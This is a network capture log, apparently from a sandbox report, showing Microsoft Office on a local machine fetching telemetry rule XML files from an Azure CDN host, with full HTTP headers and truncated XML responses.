                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:41 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1388
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                            x-ms-request-id: e02f31dd-001e-0082-0849-275880000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-17fbfdc98bbdbgkb6uyh3q4ue400000004s0000000009hua
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 1388 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            125 | 192.168.2.4 | 49879 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 192 | OUT | GET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                            x-ms-request-id: 6afd71f5-301e-003f-7d9e-26266f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-r1755647c665dwkwce4e7gadz00000000670000000008ehw
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 1415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            126 | 192.168.2.4 | 49877 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 192 | OUT | GET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1425
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                            x-ms-request-id: 8055f236-801e-0083-4e87-28f0ae000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-r1755647c66hlhp26bqv22ant400000005m000000000543f
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 1425 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            127 | 192.168.2.4 | 49880 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 192 | OUT | GET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                            x-ms-request-id: 84f9cde7-901e-0083-36a3-26bb55000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-17fbfdc98bblzxqcphe71tp4qw00000000vg000000001evx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC | 1378 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            128 | 192.168.2.4 | 49881 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:42 UTC | 192 | OUT | GET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:42 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:42 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                            x-ms-request-id: 622dd3a6-e01e-0003-140d-260fa8000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181242Z-17fbfdc98bb5d4fn785en176rg00000005d000000000a9ws
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:42 UTC | 1405 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            129 | 192.168.2.4 | 49884 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:42 UTC | 192 | OUT | GET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:42 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:42 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                                                                            x-ms-request-id: 92c6748a-601e-0001-5ca3-26faeb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181242Z-r1755647c668pfkhys7b5xnv2n00000005zg000000004ubc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:42 UTC | 1378 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
130 | 192.168.2.4 | 49882 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:42 UTC | 192 | OUT | GET /rules/rule700500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:42 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:42 GMT
Content-Type: text/xml
Content-Length: 1368
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE51CE7B3"
x-ms-request-id: dbdc188e-001e-002b-6b28-2799f2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181242Z-17fbfdc98bb2xwflv0w9dps90c000000066000000000cy0n
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:42 UTC | 1368 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


Session ID | Source IP | Source Port | Destination IP | Destination Port
131 | 192.168.2.4 | 49883 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:42 UTC | 192 | OUT | GET /rules/rule702551v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:42 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:42 GMT
Content-Type: text/xml
Content-Length: 1415
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDCE9703A"
x-ms-request-id: 30963bf2-701e-0001-2a98-28b110000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181242Z-17fbfdc98bb8mkvjfkt54wa53800000003f00000000004bx
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:42 UTC | 1415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session ID | Source IP | Source Port | Destination IP | Destination Port
132 | 192.168.2.4 | 49885 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:42 UTC | 192 | OUT | GET /rules/rule701351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:42 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:42 GMT
Content-Type: text/xml
Content-Length: 1407
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE687B46A"
x-ms-request-id: 5278af64-001e-0034-3fad-26dd04000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181242Z-17fbfdc98bbsw6nnfh43fuwvyn00000003h0000000006uqg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:42 UTC | 1407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


Session ID | Source IP | Source Port | Destination IP | Destination Port
133 | 192.168.2.4 | 59152 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:43 UTC | 192 | OUT | GET /rules/rule701350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:43 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:43 GMT
Content-Type: text/xml
Content-Length: 1370
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
ETag: "0x8DC582BDE62E0AB"
x-ms-request-id: c9ef38c2-001e-002b-2fff-2599f2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181243Z-r1755647c66vwt2b5wfzb6a20400000002700000000000tg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:43 UTC | 1370 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


Session ID | Source IP | Source Port | Destination IP | Destination Port
134 | 192.168.2.4 | 59155 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:43 UTC | 192 | OUT | GET /rules/rule702150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:43 UTC | 584 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:43 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
ETag: "0x8DC582BEDC8193E"
x-ms-request-id: 44b69168-a01e-0098-3739-288556000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181243Z-r1755647c666s72wx0z5rz6s6000000006e00000000084th
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:43 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
135 | 192.168.2.4 | 59154 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:43 UTC | 192 | OUT | GET /rules/rule703001v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:43 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:43 GMT
Content-Type: text/xml
Content-Length: 1406
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB16F27E"
x-ms-request-id: 903d302d-701e-0050-069c-276767000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181243Z-r1755647c66ss75qkr31zpy1kc000000053g0000000038n1
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:43 UTC | 1406 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


Session ID | Source IP | Source Port | Destination IP | Destination Port
136 | 192.168.2.4 | 59153 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:43 UTC | 192 | OUT | GET /rules/rule702151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:43 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:43 GMT
Content-Type: text/xml
Content-Length: 1397
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE156D2EE"
x-ms-request-id: b4130024-d01e-0082-10a3-26e489000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181243Z-17fbfdc98bbl4n669ut4r27e0800000004yg00000000f82c
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:43 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


Session ID | Source IP | Source Port | Destination IP | Destination Port
137 | 192.168.2.4 | 59157 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:43 UTC | 192 | OUT | GET /rules/rule703000v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:43 UTC | 584 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:43 GMT
Content-Type: text/xml
Content-Length: 1369
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
ETag: "0x8DC582BE32FE1A2"
x-ms-request-id: ef923803-d01e-0017-0d01-29b035000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181243Z-17fbfdc98bbt5dtr27n1qp1eqc00000005g000000000e7mt
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:43 UTC | 1369 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


Session ID | Source IP | Source Port | Destination IP | Destination Port
138 | 192.168.2.4 | 59158 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:44 UTC | 192 | OUT | GET /rules/rule700751v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:44 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:44 GMT
Content-Type: text/xml
Content-Length: 1414
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE03B051D"
x-ms-request-id: 897ec3ad-201e-005d-0167-27afb3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181244Z-r1755647c66p58nm9wqx75pnms00000004n0000000006593
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:44 UTC | 1414 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session ID | Source IP | Source Port | Destination IP | Destination Port
139 | 192.168.2.4 | 59159 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:44 UTC | 192 | OUT | GET /rules/rule700750v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:44 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:44 GMT
Content-Type: text/xml
Content-Length: 1377
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
ETag: "0x8DC582BEAFF0125"
x-ms-request-id: ef1abc9b-501e-0029-5887-28d0b8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181244Z-17fbfdc98bbgm62892kdp1w19800000004c000000000g1vs
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:44 UTC | 1377 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
140 | 192.168.2.4 | 59160 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:44 UTC | 192 | OUT | GET /rules/rule700151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:44 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:44 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE0A2434F"
x-ms-request-id: a3dcd1d1-c01e-0014-6437-29a6a3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181244Z-17fbfdc98bb2cvg4m0cmab3ecw000000043g00000000a0qf
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:44 UTC | 1399 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.4 | 59161 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:44 UTC | 192 | OUT | GET /rules/rule700150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-28 18:12:44 UTC | 563 | IN | HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 18:12:44 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE54CA33F"
x-ms-request-id: e9bbe3b2-401e-005b-3496-259c0c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241028T181244Z-r1755647c664nptf1txg2psens00000004ag0000000013cq
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-28 18:12:44 UTC | 1362 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
